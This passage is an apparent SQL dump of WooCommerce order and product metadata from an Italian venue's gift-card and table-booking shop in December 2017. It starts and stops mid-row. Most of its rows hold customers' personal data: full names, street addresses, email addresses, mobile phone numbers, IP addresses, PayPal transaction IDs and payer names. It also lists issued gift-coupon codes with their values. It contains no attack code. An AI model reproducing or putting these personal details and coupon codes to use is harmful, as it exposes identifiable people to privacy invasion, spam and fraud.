dell\'acquisto'),(7688,548,'_default_attributes','a:0:{}'),(7689,548,'_virtual','no'),(7690,548,'_downloadable','no'),(7691,548,'_product_image_gallery',''),(7692,548,'_download_limit','-1'),(7693,548,'_download_expiry','-1'),(7694,548,'_stock',NULL),(7695,548,'_stock_status','instock'),(7696,548,'_product_version','3.5.2'),(7697,548,'_price','25'),(7698,548,'mwb_wgm_pricing','a:5:{s:13:\"default_price\";s:2:\"25\";s:4:\"type\";s:19:\"mwb_wgm_range_price\";s:8:\"template\";s:3:\"468\";s:4:\"from\";s:3:\"0,1\";s:2:\"to\";s:3:\"300\";}'),(7699,548,'mwb_wgm_overwrite',NULL),(7700,548,'mwb_wgm_discount','no'),(7701,548,'mwb_wgm_exclude_per_product',''),(7702,548,'mwb_wgm_exclude_per_category',''),(7703,548,'_yoast_wpseo_primary_product_cat','26'),(7704,549,'_order_key','wc_order_5a2ec2a0b3ecf'),(7705,549,'_customer_user','0'),(7706,549,'_payment_method','paypal'),(7707,549,'_payment_method_title','PayPal'),(7708,549,'_transaction_id',''),(7709,549,'_customer_ip_address','62.211.236.161'),(7710,549,'_customer_user_agent','mozilla/5.0 (windows nt 6.1; win64; x64; rv:57.0) gecko/20100101 firefox/57.0'),(7711,549,'_created_via','checkout'),(7712,549,'_date_completed',''),(7713,549,'_completed_date',''),(7714,549,'_date_paid',''),(7715,549,'_paid_date',''),(7716,549,'_cart_hash','7b6126373526c15218e6af306b33de17'),(7717,549,'_billing_first_name','LUCA'),(7718,549,'_billing_last_name','FOLLONI'),(7719,549,'_billing_company',''),(7720,549,'_billing_address_1','via roma 30'),(7721,549,'_billing_address_2',''),(7722,549,'_billing_city','novellara re'),(7723,549,'_billing_state',''),(7724,549,'_billing_postcode',''),(7725,549,'_billing_country',''),(7726,549,'_billing_email','folloni.luca@gmail.con'),(7727,549,'_billing_phone','3486560069'),(7728,549,'_shipping_first_name',''),(7729,549,'_shipping_last_name',''),(7730,549,'_shipping_company',''),(7731,549,'_shipping_address_1',''),(7732,549,'_shipping_address_2',''),(7733,549,'_shipping_city',''),(7734,549,'_shipping_state',''),(7735,549,'_shipping_postcode',''),(7736,549,'_shipping_country',''),(7737,549,'_order_currency','EUR'),(7738,549,'_cart_discount','0'),(7739,549,'_cart_discount_tax','0'),(7740,549,'_order_shipping','0'),(7741,549,'_order_shipping_tax','0'),(7742,549,'_order_tax','0'),(7743,549,'_order_total','60.00'),(7744,549,'_order_version','3.2.5'),(7745,549,'_prices_include_tax','no'),(7746,549,'_billing_address_index','LUCA FOLLONI  via roma 30  novellara re    folloni.luca@gmail.con 3486560069'),(7747,549,'_shipping_address_index','        '),(7748,549,'Indicare in caso di prenotazione tavolo. Quanti adulti?','2'),(7749,549,'Numero bambini fino a 6 anni','0'),(7750,549,'Numero ragazzi fino a 13 anni','0'),(7751,549,'Files attached','[]'),(7752,548,'_yoast_wpseo_content_score','90'),(7753,551,'_wp_attached_file','2017/12/regala-un-coupon.png'),(7754,551,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:616;s:6:\"height\";i:800;s:4:\"file\";s:28:\"2017/12/regala-un-coupon.png\";s:5:\"sizes\";a:12:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:28:\"regala-un-coupon-300x375.png\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:28:\"regala-un-coupon-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:28:\"regala-un-coupon-600x779.png\";s:5:\"width\";i:600;s:6:\"height\";i:779;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"regala-un-coupon-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"regala-un-coupon-231x300.png\";s:5:\"width\";i:231;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:28:\"regala-un-coupon-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:28:\"regala-un-coupon-300x375.png\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:28:\"regala-un-coupon-600x779.png\";s:5:\"width\";i:600;s:6:\"height\";i:779;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"sydney-medium-thumb\";a:4:{s:4:\"file\";s:28:\"regala-un-coupon-550x400.png\";s:5:\"width\";i:550;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"sydney-small-thumb\";a:4:{s:4:\"file\";s:28:\"regala-un-coupon-230x299.png\";s:5:\"width\";i:230;s:6:\"height\";i:299;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"sydney-service-thumb\";a:4:{s:4:\"file\";s:28:\"regala-un-coupon-350x455.png\";s:5:\"width\";i:350;s:6:\"height\";i:455;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"sydney-mas-thumb\";a:4:{s:4:\"file\";s:28:\"regala-un-coupon-480x623.png\";s:5:\"width\";i:480;s:6:\"height\";i:623;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(7755,552,'_order_key','wc_order_5a2eff81141bb'),(7756,552,'_customer_user','0'),(7757,552,'_payment_method','paypal'),(7758,552,'_payment_method_title','PayPal'),(7759,552,'_transaction_id','6S252355UD2922027'),(7760,552,'_customer_ip_address','62.211.236.161'),(7761,552,'_customer_user_agent','mozilla/5.0 (windows nt 6.1; win64; x64; rv:57.0) gecko/20100101 firefox/57.0'),(7762,552,'_created_via','checkout'),(7763,552,'_date_completed',''),(7764,552,'_completed_date',''),(7765,552,'_date_paid','1513029708'),(7766,552,'_paid_date','2017-12-11 23:01:48'),(7767,552,'_cart_hash','7b6126373526c15218e6af306b33de17'),(7768,552,'_billing_first_name','MAURA'),(7769,552,'_billing_last_name','SCHIATTI'),(7770,552,'_billing_company',''),(7771,552,'_billing_address_1','via roma 30'),(7772,552,'_billing_address_2',''),(7773,552,'_billing_city','novellara re'),(7774,552,'_billing_state',''),(7775,552,'_billing_postcode',''),(7776,552,'_billing_country',''),(7777,552,'_billing_email','folloni.luca@gmail.con'),(7778,552,'_billing_phone','3486560069'),(7779,552,'_shipping_first_name',''),(7780,552,'_shipping_last_name',''),(7781,552,'_shipping_company',''),(7782,552,'_shipping_address_1',''),(7783,552,'_shipping_address_2',''),(7784,552,'_shipping_city',''),(7785,552,'_shipping_state',''),(7786,552,'_shipping_postcode',''),(7787,552,'_shipping_country',''),(7788,552,'_order_currency','EUR'),(7789,552,'_cart_discount','0'),(7790,552,'_cart_discount_tax','0'),(7791,552,'_order_shipping','0'),(7792,552,'_order_shipping_tax','0'),(7793,552,'_order_tax','0'),(7794,552,'_order_total','60.00'),(7795,552,'_order_version','3.2.5'),(7796,552,'_prices_include_tax','no'),(7797,552,'_billing_address_index','MAURA SCHIATTI  via roma 30  novellara re    folloni.luca@gmail.con 3486560069'),(7798,552,'_shipping_address_index','        '),(7799,552,'Indicare in caso di prenotazione tavolo. Quanti adulti?','2'),(7800,552,'Numero bambini fino a 6 anni','0'),(7801,552,'Numero ragazzi fino a 13 anni','0'),(7802,552,'Files attached','[]'),(7803,552,'Payer PayPal address','folloni.luca@gmail.con'),(7804,552,'Payer first name','MAURA'),(7805,552,'Payer last name','SCHIATTI'),(7806,552,'Payment type','instant'),(7807,552,'_paypal_status','completed'),(7808,552,'_download_permissions_granted','yes'),(7809,552,'_recorded_sales','yes'),(7810,552,'_recorded_coupon_usage_counts','yes'),(7811,552,'_order_stock_reduced','yes'),(7812,552,'PayPal Transaction Fee','2.39'),(7813,553,'_order_key','wc_order_5a2fcbb39095d'),(7814,553,'_customer_user','0'),(7815,553,'_payment_method','paypal'),(7816,553,'_payment_method_title','PayPal'),(7817,553,'_transaction_id','82709089WB925220A'),(7818,553,'_customer_ip_address','79.8.246.126'),(7819,553,'_customer_user_agent','mozilla/5.0 (windows nt 10.0; win64; x64; rv:57.0) gecko/20100101 firefox/57.0'),(7820,553,'_created_via','checkout'),(7821,553,'_date_completed',''),(7822,553,'_completed_date',''),(7823,553,'_date_paid','1513081926'),(7824,553,'_paid_date','2017-12-12 13:32:06'),(7825,553,'_cart_hash','7d38e764375169b0b7505180ac24f9d3'),(7826,553,'_billing_first_name','Senni'),(7827,553,'_billing_last_name','Senni'),(7828,553,'_billing_company',''),(7829,553,'_billing_address_1','via martiri dungheria 31'),(7830,553,'_billing_address_2',''),(7831,553,'_billing_city','cesena'),(7832,553,'_billing_state',''),(7833,553,'_billing_postcode',''),(7834,553,'_billing_country',''),(7835,553,'_billing_email','info@moniasenninutrizionista.it'),(7836,553,'_billing_phone','3389239736'),(7837,553,'_shipping_first_name',''),(7838,553,'_shipping_last_name',''),(7839,553,'_shipping_company',''),(7840,553,'_shipping_address_1',''),(7841,553,'_shipping_address_2',''),(7842,553,'_shipping_city',''),(7843,553,'_shipping_state',''),(7844,553,'_shipping_postcode',''),(7845,553,'_shipping_country',''),(7846,553,'_order_currency','EUR'),(7847,553,'_cart_discount','0'),(7848,553,'_cart_discount_tax','0'),(7849,553,'_order_shipping','0'),(7850,553,'_order_shipping_tax','0'),(7851,553,'_order_tax','0'),(7852,553,'_order_total','150.00'),(7853,553,'_order_version','3.2.5'),(7854,553,'_prices_include_tax','no'),(7855,553,'_billing_address_index','Senni Senni  via martiri dungheria 31  cesena    info@moniasenninutrizionista.it 3389239736'),(7856,553,'_shipping_address_index','        '),(7857,553,'Indicare in caso di prenotazione tavolo. Quanti adulti?','3'),(7858,553,'Numero bambini fino a 6 anni','0'),(7859,553,'Numero ragazzi fino a 13 anni','0'),(7860,553,'Files attached','[]'),(7861,553,'Payer PayPal address','info@moniasenninutrizionista.it'),(7862,553,'Payer first name','Senni'),(7863,553,'Payer last name','Senni'),(7864,553,'Payment type','instant'),(7865,553,'_paypal_status','completed'),(7866,553,'_download_permissions_granted','yes'),(7867,553,'_recorded_sales','yes'),(7868,553,'_recorded_coupon_usage_counts','yes'),(7869,553,'_order_stock_reduced','yes'),(7870,553,'PayPal Transaction Fee','5.45'),(7871,554,'_menu_item_type','taxonomy'),(7872,554,'_menu_item_menu_item_parent','0'),(7873,554,'_menu_item_object_id','25'),(7874,554,'_menu_item_object','product_cat'),(7875,554,'_menu_item_target',''),(7876,554,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(7877,554,'_menu_item_xfn',''),(7878,554,'_menu_item_url',''),(7880,555,'_order_key','wc_order_5a3278c0137cf'),(7881,555,'_customer_user','0'),(7882,555,'_payment_method','paypal'),(7883,555,'_payment_method_title','PayPal'),(7884,555,'_transaction_id','9GC82395DL3478316'),(7885,555,'_customer_ip_address','62.220.90.98'),(7886,555,'_customer_user_agent','mozilla/5.0 (windows nt 6.2; win64; x64; rv:57.0) gecko/20100101 firefox/57.0'),(7887,555,'_created_via','checkout'),(7888,555,'_date_completed','1513257699'),(7889,555,'_completed_date','2017-12-14 14:21:39'),(7890,555,'_date_paid','1513257645'),(7891,555,'_paid_date','2017-12-14 14:20:45'),(7892,555,'_cart_hash','6ecf0e16768fc855ab73a62ce4bfe44e'),(7893,555,'_billing_first_name','matteo'),(7894,555,'_billing_last_name','palomba'),(7895,555,'_billing_company',''),(7896,555,'_billing_address_1','via riace 27'),(7897,555,'_billing_address_2',''),(7898,555,'_billing_city','riccione'),(7899,555,'_billing_state',''),(7900,555,'_billing_postcode',''),(7901,555,'_billing_country',''),(7902,555,'_billing_email','m.palomba77@libero.it'),(7903,555,'_billing_phone','3391661331'),(7904,555,'_shipping_first_name',''),(7905,555,'_shipping_last_name',''),(7906,555,'_shipping_company',''),(7907,555,'_shipping_address_1',''),(7908,555,'_shipping_address_2',''),(7909,555,'_shipping_city',''),(7910,555,'_shipping_state',''),(7911,555,'_shipping_postcode',''),(7912,555,'_shipping_country',''),(7913,555,'_order_currency','EUR'),(7914,555,'_cart_discount','0'),(7915,555,'_cart_discount_tax','0'),(7916,555,'_order_shipping','0'),(7917,555,'_order_shipping_tax','0'),(7918,555,'_order_tax','0'),(7919,555,'_order_total','150.00'),(7920,555,'_order_version','3.2.5'),(7921,555,'_prices_include_tax','no'),(7922,555,'_billing_address_index','matteo palomba  via riace 27  riccione    m.palomba77@libero.it 3391661331'),(7923,555,'_shipping_address_index','        '),(7924,555,'Indicare in caso di prenotazione tavolo. Quanti adulti?','2'),(7925,555,'Numero bambini fino a 6 anni','0'),(7926,555,'Numero ragazzi fino a 13 anni','0'),(7927,555,'Files attached','[]'),(7928,555,'Payer PayPal address','m.palomba77@libero.it'),(7929,555,'Payer first name','matteo'),(7930,555,'Payer last name','palomba'),(7931,555,'Payment type','instant'),(7932,555,'_paypal_status','completed'),(7933,555,'_download_permissions_granted','yes'),(7934,555,'_recorded_sales','yes'),(7935,555,'_recorded_coupon_usage_counts','yes'),(7936,556,'discount_type','fixed_cart'),(7937,556,'coupon_amount','150'),(7938,556,'individual_use','no'),(7939,556,'usage_limit','1'),(7940,556,'expiry_date','2018-06-12'),(7941,556,'apply_before_tax','no'),(7942,556,'free_shipping','no'),(7943,556,'minimum_amount',''),(7944,556,'maximum_amount',''),(7945,556,'exclude_sale_items','no'),(7946,556,'exclude_product_ids',''),(7947,556,'exclude_product_categories',''),(7948,556,'mwb_wgm_giftcard_coupon','555'),(7949,556,'mwb_wgm_giftcard_coupon_unique','online'),(7950,556,'mwb_wgm_giftcard_coupon_product_id','548'),(7951,556,'mwb_wgm_giftcard_coupon_mail_to','m.palomba77@libero.it'),(7952,555,'555#128','solymarcouponGKP7M'),(7953,555,'mwb_wgm_order_giftcard','send'),(7954,555,'_order_stock_reduced','yes'),(7955,555,'PayPal Transaction Fee','5.45'),(7956,557,'_order_key','wc_order_5a359977f2821'),(7957,557,'_customer_user','0'),(7958,557,'_payment_method','paypal'),(7959,557,'_payment_method_title','PayPal'),(7960,557,'_transaction_id','6DT21188BK740250T'),(7961,557,'_customer_ip_address','2.234.219.3'),(7962,557,'_customer_user_agent','mozilla/5.0 (macintosh; intel mac os x 10_12_6) applewebkit/537.36 (khtml, like gecko) chrome/63.0.3239.84 safari/537.36'),(7963,557,'_created_via','checkout'),(7964,557,'_date_completed',''),(7965,557,'_completed_date',''),(7966,557,'_date_paid','1513462317'),(7967,557,'_paid_date','2017-12-16 23:11:57'),(7968,557,'_cart_hash','1d9ddb2a530f0b09f1e0fe99aec70955'),(7969,557,'_billing_first_name','Piero'),(7970,557,'_billing_last_name','Maccagnani'),(7971,557,'_billing_company',''),(7972,557,'_billing_address_1','via Andrea Costa 127, 40134'),(7973,557,'_billing_address_2',''),(7974,557,'_billing_city','Bologna'),(7975,557,'_billing_state',''),(7976,557,'_billing_postcode',''),(7977,557,'_billing_country',''),(7978,557,'_billing_email','maccagnani.piero@gmail.com'),(7979,557,'_billing_phone','3395738260'),(7980,557,'_shipping_first_name',''),(7981,557,'_shipping_last_name',''),(7982,557,'_shipping_company',''),(7983,557,'_shipping_address_1',''),(7984,557,'_shipping_address_2',''),(7985,557,'_shipping_city',''),(7986,557,'_shipping_state',''),(7987,557,'_shipping_postcode',''),(7988,557,'_shipping_country',''),(7989,557,'_order_currency','EUR'),(7990,557,'_cart_discount','0'),(7991,557,'_cart_discount_tax','0'),(7992,557,'_order_shipping','0'),(7993,557,'_order_shipping_tax','0'),(7994,557,'_order_tax','0'),(7995,557,'_order_total','180.00'),(7996,557,'_order_version','3.2.5'),(7997,557,'_prices_include_tax','no'),(7998,557,'_billing_address_index','Piero Maccagnani  via Andrea Costa 127, 40134  Bologna    maccagnani.piero@gmail.com 3395738260'),(7999,557,'_shipping_address_index','        '),(8000,557,'Indicare in caso di prenotazione tavolo. Quanti adulti?','6'),(8001,557,'Numero bambini fino a 6 anni','0'),(8002,557,'Numero ragazzi fino a 13 anni','0'),(8003,557,'Files attached','[]'),(8004,557,'Payer PayPal address','maccagnani.piero@gmail.com'),(8005,557,'Payer first name','Piero'),(8006,557,'Payer last name','Maccagnani'),(8007,557,'Payment type','instant'),(8008,557,'_paypal_status','completed'),(8009,557,'_download_permissions_granted','yes'),(8010,557,'_recorded_sales','yes'),(8011,557,'_recorded_coupon_usage_counts','yes'),(8012,557,'_order_stock_reduced','yes'),(8013,557,'PayPal Transaction Fee','6.47'),(8014,558,'_order_key','wc_order_5a3655a6234e8'),(8015,558,'_customer_user','15'),(8016,558,'_payment_method','paypal'),(8017,558,'_payment_method_title','PayPal'),(8018,558,'_transaction_id','1AA5092947754203W'),(8019,558,'_customer_ip_address','31.159.61.7'),(8020,558,'_customer_user_agent','mozilla/5.0 (ipad; cpu os 10_3_3 like mac os x) applewebkit/603.3.8 (khtml, like gecko) version/10.0 mobile/14g60 safari/602.1'),(8021,558,'_created_via','checkout'),(8022,558,'_date_completed',''),(8023,558,'_completed_date',''),(8024,558,'_date_paid','1513510526'),(8025,558,'_paid_date','2017-12-17 12:35:26'),(8026,558,'_cart_hash','7b6126373526c15218e6af306b33de17'),(8027,558,'_billing_first_name','Alessandro'),(8028,558,'_billing_last_name','Schwarz'),(8029,558,'_billing_company',''),(8030,558,'_billing_address_1','Via s.pertini 32'),(8031,558,'_billing_address_2',''),(8032,558,'_billing_city','San Giovanni in persiceto (Bo)'),(8033,558,'_billing_state',''),(8034,558,'_billing_postcode',''),(8035,558,'_billing_country',''),(8036,558,'_billing_email','Alessandro.schwarz@errelle.net'),(8037,558,'_billing_phone','3487475012'),(8038,558,'_shipping_first_name',''),(8039,558,'_shipping_last_name',''),(8040,558,'_shipping_company',''),(8041,558,'_shipping_address_1',''),(8042,558,'_shipping_address_2',''),(8043,558,'_shipping_city',''),(8044,558,'_shipping_state',''),(8045,558,'_shipping_postcode',''),(8046,558,'_shipping_country',''),(8047,558,'_order_currency','EUR'),(8048,558,'_cart_discount','0'),(8049,558,'_cart_discount_tax','0'),(8050,558,'_order_shipping','0'),(8051,558,'_order_shipping_tax','0'),(8052,558,'_order_tax','0'),(8053,558,'_order_total','60.00'),(8054,558,'_order_version','3.2.5'),(8055,558,'_prices_include_tax','no'),(8056,558,'_billing_address_index','Alessandro Schwarz  Via s.pertini 32  San Giovanni in persiceto (Bo)    Alessandro.schwarz@errelle.net 3487475012'),(8057,558,'_shipping_address_index','        '),(8058,558,'Indicare in caso di prenotazione tavolo. Quanti adulti?','2'),(8059,558,'Numero bambini fino a 6 anni','0'),(8060,558,'Numero ragazzi fino a 13 anni','0'),(8061,558,'Files attached','[]'),(8062,558,'Payer PayPal address','Alessandro.schwarz@errelle.net'),(8063,558,'Payer first name','barbara'),(8064,558,'Payer last name','poggi'),(8065,558,'Payment type','instant'),(8066,558,'_paypal_status','completed'),(8067,558,'_download_permissions_granted','yes'),(8068,558,'_recorded_sales','yes'),(8069,558,'_recorded_coupon_usage_counts','yes'),(8070,558,'_order_stock_reduced','yes'),(8071,558,'PayPal Transaction Fee','2.39'),(8072,559,'_order_key','wc_order_5a36cfcebecaf'),(8073,559,'_customer_user','0'),(8074,559,'_payment_method','paypal'),(8075,559,'_payment_method_title','PayPal'),(8076,559,'_transaction_id','3F446398JX791183G'),(8077,559,'_customer_ip_address','2.234.219.3'),(8078,559,'_customer_user_agent','mozilla/5.0 (macintosh; intel mac os x 10_12_6) applewebkit/537.36 (khtml, like gecko) chrome/63.0.3239.84 safari/537.36'),(8079,559,'_created_via','checkout'),(8080,559,'_date_completed',''),(8081,559,'_completed_date',''),(8082,559,'_date_paid','1513541680'),(8083,559,'_paid_date','2017-12-17 21:14:40'),(8084,559,'_cart_hash','7b6126373526c15218e6af306b33de17'),(8085,559,'_billing_first_name','Piero'),(8086,559,'_billing_last_name','Maccagnani'),(8087,559,'_billing_company',''),(8088,559,'_billing_address_1','via Andrea Costa 127, 40134'),(8089,559,'_billing_address_2',''),(8090,559,'_billing_city','Bologna'),(8091,559,'_billing_state',''),(8092,559,'_billing_postcode',''),(8093,559,'_billing_country',''),(8094,559,'_billing_email','maccagnani.piero@gmail.com'),(8095,559,'_billing_phone','3395738260'),(8096,559,'_shipping_first_name',''),(8097,559,'_shipping_last_name',''),(8098,559,'_shipping_company',''),(8099,559,'_shipping_address_1',''),(8100,559,'_shipping_address_2',''),(8101,559,'_shipping_city',''),(8102,559,'_shipping_state',''),(8103,559,'_shipping_postcode',''),(8104,559,'_shipping_country',''),(8105,559,'_order_currency','EUR'),(8106,559,'_cart_discount','0'),(8107,559,'_cart_discount_tax','0'),(8108,559,'_order_shipping','0'),(8109,559,'_order_shipping_tax','0'),(8110,559,'_order_tax','0'),(8111,559,'_order_total','60.00'),(8112,559,'_order_version','3.2.5'),(8113,559,'_prices_include_tax','no'),(8114,559,'_billing_address_index','Piero Maccagnani  via Andrea Costa 127, 40134  Bologna    maccagnani.piero@gmail.com 3395738260'),(8115,559,'_shipping_address_index','        '),(8116,559,'Indicare in caso di prenotazione tavolo. Quanti adulti?','2'),(8117,559,'Numero bambini fino a 6 anni','0'),(8118,559,'Numero ragazzi fino a 13 anni','0'),(8119,559,'Files attached','[]'),(8120,559,'Payer PayPal address','maccagnani.piero@gmail.com'),(8121,559,'Payer first name','Piero'),(8122,559,'Payer last name','Maccagnani'),(8123,559,'Payment type','instant'),(8124,559,'_paypal_status','completed'),(8125,559,'_download_permissions_granted','yes'),(8126,559,'_recorded_sales','yes'),(8127,559,'_recorded_coupon_usage_counts','yes'),(8128,559,'_order_stock_reduced','yes'),(8129,559,'PayPal Transaction Fee','2.39'),(8130,560,'_order_key','wc_order_5a3795b5a7b3f'),(8131,560,'_customer_user','0'),(8132,560,'_payment_method','paypal'),(8133,560,'_payment_method_title','PayPal'),(8134,560,'_transaction_id','0CX79713F7534660W'),(8135,560,'_customer_ip_address','79.25.57.165'),(8136,560,'_customer_user_agent','mozilla/5.0 (windows nt 6.3; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/61.0.3163.100 safari/537.36'),(8137,560,'_created_via','checkout'),(8138,560,'_date_completed',''),(8139,560,'_completed_date',''),(8140,560,'_date_paid','1513592500'),(8141,560,'_paid_date','2017-12-18 11:21:40'),(8142,560,'_cart_hash','ce9997d039e2d0e821e14fe866dec687'),(8143,560,'_billing_first_name','Stefania'),(8144,560,'_billing_last_name','Fabbri'),(8145,560,'_billing_company',''),(8146,560,'_billing_address_1','VIA Coira 16'),(8147,560,'_billing_address_2',''),(8148,560,'_billing_city','RIMINI'),(8149,560,'_billing_state',''),(8150,560,'_billing_postcode',''),(8151,560,'_billing_country',''),(8152,560,'_billing_email','stefyfabbri82@gmail.com'),(8153,560,'_billing_phone','3394521948'),(8154,560,'_shipping_first_name',''),(8155,560,'_shipping_last_name',''),(8156,560,'_shipping_company',''),(8157,560,'_shipping_address_1',''),(8158,560,'_shipping_address_2',''),(8159,560,'_shipping_city',''),(8160,560,'_shipping_state',''),(8161,560,'_shipping_postcode',''),(8162,560,'_shipping_country',''),(8163,560,'_order_currency','EUR'),(8164,560,'_cart_discount','0'),(8165,560,'_cart_discount_tax','0'),(8166,560,'_order_shipping','0'),(8167,560,'_order_shipping_tax','0'),(8168,560,'_order_tax','0'),(8169,560,'_order_total','120.00'),(8170,560,'_order_version','3.2.5'),(8171,560,'_prices_include_tax','no'),(8172,560,'_billing_address_index','Stefania Fabbri  VIA Coira 16  RIMINI    stefyfabbri82@gmail.com 3394521948'),(8173,560,'_shipping_address_index','        '),(8174,560,'Indicare in caso di prenotazione tavolo. Quanti adulti?','2'),(8175,560,'Numero bambini fino a 6 anni','0'),(8176,560,'Numero ragazzi fino a 13 anni','0'),(8177,560,'Files attached','[]'),(8178,560,'Payer PayPal address','stefyfabbri82@gmail.com'),(8179,560,'Payer first name','Stefania'),(8180,560,'Payer last name','Fabbri'),(8181,560,'Payment type','instant'),(8182,560,'_paypal_status','completed'),(8183,560,'_download_permissions_granted','yes'),(8184,560,'_recorded_sales','yes'),(8185,560,'_recorded_coupon_usage_counts','yes'),(8186,561,'discount_type','fixed_cart'),(8187,561,'coupon_amount','120'),(8188,561,'individual_use','no'),(8189,561,'usage_limit','1'),(8190,561,'expiry_date','2018-06-16'),(8191,561,'apply_before_tax','no'),(8192,561,'free_shipping','no'),(8193,561,'minimum_amount',''),(8194,561,'maximum_amount',''),(8195,561,'exclude_sale_items','no'),(8196,561,'exclude_product_ids',''),(8197,561,'exclude_product_categories',''),(8198,561,'mwb_wgm_giftcard_coupon','560'),(8199,561,'mwb_wgm_giftcard_coupon_unique','online'),(8200,561,'mwb_wgm_giftcard_coupon_product_id','472'),(8201,561,'mwb_wgm_giftcard_coupon_mail_to','stefyfabbri82@gmail.com'),(8202,560,'560#133','solymarcouponJ90GY'),(8203,560,'mwb_wgm_order_giftcard','send'),(8204,560,'_order_stock_reduced','yes'),(8205,560,'PayPal Transaction Fee','4.43'),(8206,562,'_order_key','wc_order_5a37bdb7d9a7d'),(8207,562,'_customer_user','0'),(8208,562,'_payment_method','paypal'),(8209,562,'_payment_method_title','PayPal'),(8210,562,'_transaction_id','3J451757U47165050'),(8211,562,'_customer_ip_address','185.112.6.26'),(8212,562,'_customer_user_agent','mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/63.0.3239.84 safari/537.36'),(8213,562,'_created_via','checkout'),(8214,562,'_date_completed',''),(8215,562,'_completed_date',''),(8216,562,'_date_paid','1513602603'),(8217,562,'_paid_date','2017-12-18 14:10:03'),(8218,562,'_cart_hash','68efc55fbce80c20a5540766cf3bfac4'),(8219,562,'_billing_first_name','Iacopo'),(8220,562,'_billing_last_name','Mannelli'),(8221,562,'_billing_company',''),(8222,562,'_billing_address_1','Loc.le Poggiola 16/e'),(8223,562,'_billing_address_2',''),(8224,562,'_billing_city','Arezzo'),(8225,562,'_billing_state',''),(8226,562,'_billing_postcode',''),(8227,562,'_billing_country',''),(8228,562,'_billing_email','manne88@live.it'),(8229,562,'_billing_phone','3394871005'),(8230,562,'_shipping_first_name',''),(8231,562,'_shipping_last_name',''),(8232,562,'_shipping_company',''),(8233,562,'_shipping_address_1',''),(8234,562,'_shipping_address_2',''),(8235,562,'_shipping_city',''),(8236,562,'_shipping_state',''),(8237,562,'_shipping_postcode',''),(8238,562,'_shipping_country',''),(8239,562,'_order_currency','EUR'),(8240,562,'_cart_discount','0'),(8241,562,'_cart_discount_tax','0'),(8242,562,'_order_shipping','0'),(8243,562,'_order_shipping_tax','0'),(8244,562,'_order_tax','0'),(8245,562,'_order_total','120.00'),(8246,562,'_order_version','3.2.5'),(8247,562,'_prices_include_tax','no'),(8248,562,'_billing_address_index','Iacopo Mannelli  Loc.le Poggiola 16/e  Arezzo    manne88@live.it 3394871005'),(8249,562,'_shipping_address_index','        '),(8250,562,'Indicare in caso di prenotazione tavolo. Quanti adulti?','4'),(8251,562,'Numero bambini fino a 6 anni','0'),(8252,562,'Numero ragazzi fino a 13 anni','0'),(8253,562,'Files attached','[]'),(8254,562,'Payer PayPal address','manne88@live.it'),(8255,562,'Payer first name','Giulia'),(8256,562,'Payer last name','Remilli'),(8257,562,'Payment type','instant'),(8258,562,'_paypal_status','completed'),(8259,562,'_download_permissions_granted','yes'),(8260,562,'_recorded_sales','yes'),(8261,562,'_recorded_coupon_usage_counts','yes'),(8262,562,'_order_stock_reduced','yes'),(8263,562,'PayPal Transaction Fee','4.43'),(8264,563,'_order_key','wc_order_5a381bc24f5ba'),(8265,563,'_customer_user','0'),(8266,563,'_payment_method','paypal'),(8267,563,'_payment_method_title','PayPal'),(8268,563,'_transaction_id',''),(8269,563,'_customer_ip_address','79.32.8.130'),(8270,563,'_customer_user_agent','mozilla/5.0 (linux; android 4.4.2; gt-n7100 build/kot49h) applewebkit/537.36 (khtml, like gecko) chrome/62.0.3202.84 mobile safari/537.36'),(8271,563,'_created_via','checkout'),(8272,563,'_date_completed',''),(8273,563,'_completed_date',''),(8274,563,'_date_paid',''),(8275,563,'_paid_date',''),(8276,563,'_cart_hash','7b6126373526c15218e6af306b33de17'),(8277,563,'_billing_first_name','luigi'),(8278,563,'_billing_last_name','veneziani'),(8279,563,'_billing_company',''),(8280,563,'_billing_address_1','San 